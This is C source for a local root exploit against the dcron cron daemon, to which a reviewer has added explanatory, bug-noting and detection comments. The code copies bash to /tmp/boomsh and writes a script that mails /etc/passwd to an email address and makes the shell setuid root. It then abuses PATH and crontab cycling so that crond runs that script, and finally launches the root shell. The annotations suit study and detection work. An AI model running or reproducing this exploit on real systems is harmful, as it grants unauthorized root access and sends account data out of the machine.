/***********************************************
* released under (E) licensing ... *
* (E) RULES AND REGULATIONS *
* permission to use/rewrite/add : granted *
* permission to trojan/steal : denied *
* permission to use illegally : denied *
* permission to use on /dev/urandom : denied *
***********************************************/
/* contact el8@press.co.jp for full license */
/* code copyrighted by ~el8 -- don't infringe! */
/*************************************************************************\
| ----====----====---- . . LOCAL DCRON EXPLOIT . . ----====----====---- |
| |
| brought to you by |
| |
| (C) Michal Zalewski <lcamtuf@ids.pl> . and . Nergal <nergal@icm.edu.pl> |
| |
| ----------------------------------------------------------------------- |
| Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] |
| ----------------------------------------------------------------------- |
| |
\*************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define PRINT_STATUS(x,p...) printf("\033[1;35m:::\033[0;35m "x,##p)
/* Tentative definitions of the two option-driven globals; the initialized
 * definitions (with the DEFAULT_* values) appear further down the file.
 * cron_path is the command written into the crontab line by make_tempfile();
 * email_address is the recipient of the "mail ... < /etc/passwd" line in the
 * same generated script. */
char*cron_path;
char*email_address;
/* Process environment, forwarded unchanged to execle() in shell(). */
extern char**environ;
/* Print the coloured one-line banner shown before anything else runs.
 * The two adjacent literals are what the original emitted as two printf() calls. */
void print_banner(void) {
	fputs("\033[1;37m\t\t ---===---===--- \033[0;31md\033[1;31mcron "
	      "\033[1;33mLOCAL \033[1;36m EXPLOIT \033[1;37m---===---===---\n",
	      stdout);
}
/* Print the usage text; reached on -h, on an unrecognised option, or when
 * main() is started without arguments. Output is byte-identical to the
 * original three printf() calls. */
void print_help(void) {
	fputs("\n\t\tUsage:"
	      "\t\033[0;35m./dcron -e your_email [-p path_to_crond]\n"
	      "\033[0;37m\n",
	      stdout);
}
/* Write a shell script named "nnn" into the current working directory and
 * mark it executable. The script, when run, feeds a one-line crontab
 * ("* * * * * <cron_path>") to "crontab -" through a here-document, mails
 * /etc/passwd to email_address, sets /tmp/boomsh to mode 4755, deletes
 * /tmp/cron* and /tmp/gcc*, and runs "crontab -d". Nothing in this function
 * executes the script; it only creates it. Exits with status 1 if the file
 * cannot be opened.
 * Detection: the on-disk artifacts are the "nnn" file, a crontab line naming
 * cron_path, an outbound mail whose body is /etc/passwd, and a /tmp/boomsh
 * that later carries mode 4755. */
void make_tempfile(void) {
FILE*temp;
char*file="nnn"; /* relative path: lands wherever the program is started */
if((temp=fopen(file,"w"))==NULL) {
perror("fopen!!!");
(void)exit(1);
}
fprintf(temp,"###############################\n");
fprintf(temp,"## DCRON EXPLOIT - TEMP FILE ##\n");
fprintf(temp,"###############################\n");
fprintf(temp,"\n");
fprintf(temp,"crontab - << EOF\n");
fprintf(temp,"* * * * * %s\n",cron_path); /* every-minute entry; cron_path is interpolated unquoted */
fprintf(temp,"EOF\n");
fprintf(temp,"\n");
fprintf(temp,"mail %s < /etc/passwd\n",email_address);
fprintf(temp,"chmod 4755 /tmp/boomsh\n");
fprintf(temp,"rm -f /tmp/cron* /tmp/gcc*\n");
fprintf(temp,"\n");
/* Redirection order matters: stderr goes to the script's stdout, then stdout
 * goes to /dev/null, so crontab's error output is what remains visible. */
fprintf(temp,"crontab -d 2>&1 1>/dev/null\n");
/* "\033" is resolved by the C compiler, so the generated script contains a raw
 * ESC byte inside the printf argument, not a backslash sequence. */
fprintf(temp,"printf '\033[0;37m'\n");
fprintf(temp,"\n");
fprintf(temp,"## DONE!\n");
fflush(temp);
fclose(temp); /* return value not checked; a write error would go unnoticed */
(void)chmod(file,0755); /* result ignored */
PRINT_STATUS("Tempfile ready!\n");
}
/* Fork a child that exec's /usr/bin/crontab, then wait for it.
 * The execl() argument list is ("-c", "./"): "-c" occupies the argv[0] slot
 * and "./" is the only real argument crontab receives — presumably intended as
 * "crontab -c ./" with a program name first; TODO confirm against the crontab
 * version targeted. If exec fails the child leaves via _exit(-1) (status 255)
 * without any message. The parent sleeps one second and then blocks in
 * waitpid(); status is collected but never examined. A failed fork() is not
 * checked: pid would be -1, which waitpid() treats as "any child". */
void add_crontab_entry(void) {
int status;
pid_t pid;
if((pid=fork())==0) {
(void)execl("/usr/bin/crontab","-c","./",NULL);
(void)_exit(-1);
}
(void)sleep(1);
(void)waitpid(pid,&status,0);
}
/* Counterpart of add_crontab_entry(): fork a child that exec's
 * /usr/bin/crontab with the argument list ("-d", "./") and wait for it.
 * As in add_crontab_entry(), "-d" sits in the argv[0] slot and "./" is the
 * only real argument; exec failure ends the child with _exit(-1) silently,
 * the parent sleeps one second before waitpid(), the collected status is
 * never inspected, and a failed fork() (pid == -1) is not handled. */
void remove_crontab_entry(void)
{
int status;
pid_t pid;
if((pid=fork())==0) {
(void)execl("/usr/bin/crontab","-d","./",NULL);
(void)_exit(-1);
}
(void)sleep(1);
(void)waitpid(pid,&status,0);
}
/* Set PATH so that /var/spool/cron and the current directory (".") are
 * searched before the system directories, then add and remove a crontab
 * entry three times, printing progress for each round. How this interacts
 * with crond is not visible in this file; presumably the PATH ordering is
 * what makes a command name resolve inside the spool directory or "." —
 * TODO confirm against the crond/crontab version targeted.
 * Detection: a user process whose PATH begins with /var/spool/cron is itself
 * a strong anomaly, as is a crontab being created and deleted in quick
 * succession several times. */
void bombard_crond(void) {
int i;
setenv("PATH","/var/spool/cron:/usr/bin:.:/bin/:/usr/sbin",1); /* overwrite=1: replaces any existing PATH */
for(i=0;i<3;i++) {
PRINT_STATUS("Adding a crontab entry ... \033[1;32m(%d/3)\n",i+1);
add_crontab_entry();
PRINT_STATUS("Removing the entry ... \033[1;32m(%d/3)\n",i+1);
remove_crontab_entry();
}
PRINT_STATUS("Processing...!!\n");
}
/* Copy /bin/bash byte-for-byte to /tmp/boomsh in 5000-byte chunks and chmod
 * it 0755. The setuid bit is NOT set here; the script written by
 * make_tempfile() contains the "chmod 4755 /tmp/boomsh" line that is expected
 * to run with elevated rights (see the trailing comment below). Exits with
 * status 1 if either open() fails.
 * Observations on the code as written: open() is called with O_CREAT but
 * without the mode argument, so the initial permission bits are unspecified
 * until the final chmod(); O_TRUNC is absent, so an existing /tmp/boomsh is
 * overwritten in place; write() return values are discarded, so a short write
 * is never noticed.
 * Detection: a copy of bash under /tmp, especially one that later becomes
 * mode 4755 owned by root, is the artifact to look for. */
void make_boomsh(void) {
u_char buf[5000]; /* u_char is a BSD-style typedef supplied by <sys/types.h> on most Unix libcs, not standard C */
int sh,boomsh,e;
sh=open("/bin/bash",O_RDONLY);
if(sh==-1) {
perror("copy!!!");
(void)exit(1);
}
boomsh=open("/tmp/boomsh",O_WRONLY|O_CREAT); /* third (mode) argument missing */
if(boomsh==-1) {
perror("copy!!!");
(void)exit(1);
}
while((e=read(sh,buf,5000))>0) {
(void)write(boomsh,buf,e); /* bytes actually written are not checked */
}
(void)close(sh);
(void)close(boomsh);
(void)chmod("/tmp/boomsh",0755);//crond will make it 4755 root!!!
}
/* Print the closing status lines and replace this process with /tmp/boomsh
 * (argv[0] "boomsh", no further arguments, the inherited environment). If
 * execle() fails the function just returns and main() ends normally; no error
 * is printed and its return value is not checked.
 * NOTE(review): the third PRINT_STATUS string literal is split across two
 * source lines in this listing, which is not valid C — most likely a
 * line-wrap artifact of the page rather than of the original source. */
void shell(void) {
PRINT_STATUS("\033[1;37m ----====---- \033[1;36m EXPLOIT \033[1;32m FINISHED \033[1;37m ----====----\n");
PRINT_STATUS("\033[1;37m ---====-- \033[1;34m WAITING \033[1;35m FOR\033[5;33m ROOTSHELL! \033[1;37m --====---\n");
PRINT_STATUS("\033[1;37m ---====-- \033[1;34m HIT RETURN \033[1;35m TO
\033[5;33m SYNC!!!! \033[1;37m --====---\n");
PRINT_STATUS("\033[1;37m ----=====---- \033[1;32m!\033[1;34m!\033[5;0n!\033[1;33m!\033[5;0n!\033[5;0n!\033[0;30m ----====----\n");
execle("/tmp/boomsh","boomsh",NULL,environ);
}
/* Option defaults and the initialized definitions of the two globals declared
 * near the top of the file. The email default is a placeholder string, yet
 * get_options() below reassigns both globals to these defaults after parsing,
 * so in this listing these are the values actually used. */
#define DEFAULT_EMAIL_ADDRESS "your-address@mail.com"
#define DEFAULT_CRON_PATH "/usr/sbin/crond"
char* email_address = DEFAULT_EMAIL_ADDRESS;
char* cron_path = DEFAULT_CRON_PATH;
/* Parse -p <path_to_crond>, -e <email> and -h from argv with getopt().
 * -h or any unrecognised option prints the usage text and exits with status 0.
 * The two trailing if-blocks test pointers that are never NULL at that point:
 * both globals start out pointing at the DEFAULT_* literals, and a matched
 * option replaces them with a strdup() result. Both branches therefore always
 * run — whatever -p/-e supplied is discarded, the defaults are restored, and
 * the strdup()'d copies are leaked. As written, the generated script always
 * mails /etc/passwd to DEFAULT_EMAIL_ADDRESS regardless of -e. */
void get_options(int argc,char*argv[])
{
int a;
#define GETOPT_ARGUMENTS "p:e:h"
while((a=getopt(argc,argv,GETOPT_ARGUMENTS))!=EOF) { /* getopt() returns -1 at end of options; EOF is relied on to equal -1 */
switch(a) {
case 'p':
cron_path=(char*)strdup(optarg); /* cast is unnecessary in C */
break;
case 'e':
email_address=(char*)strdup(optarg);
break;
case 'h':
default:
(void)print_help();
(void)exit(0);
}
}
/* Always true: cron_path was never NULL (see above). */
if(cron_path) {
cron_path=DEFAULT_CRON_PATH;
}
/* Always true for the same reason. */
if(email_address) {
email_address=DEFAULT_EMAIL_ADDRESS;
}
}
/* Entry point. Prints the banner; with fewer than two argv entries prints the
 * usage text and exits 0. Otherwise parses options and runs the stages in
 * order: copy bash to /tmp/boomsh, write the "nnn" script, cycle the crontab
 * add/remove three times, then exec /tmp/boomsh. The (void) casts on calls to
 * void functions are no-ops. main() has no return statement; under C99 and
 * later, falling off the end of main() yields exit status 0, which is also
 * what happens if the final execle() fails. */
int main (int argc,char*argv[]) {
(void)print_banner();
if(argc<2) {
(void)print_help();
(void)exit(0);
}
(void)get_options(argc,argv);
PRINT_STATUS("Making /tmp/boomsh...\n");
(void)make_boomsh();
PRINT_STATUS("Making tempfile...\n");
(void)make_tempfile();
PRINT_STATUS("Bombing crond...\n");
(void)bombard_crond();
PRINT_STATUS("ROOTSHELL ENJOY!!!\n");
(void)shell();
}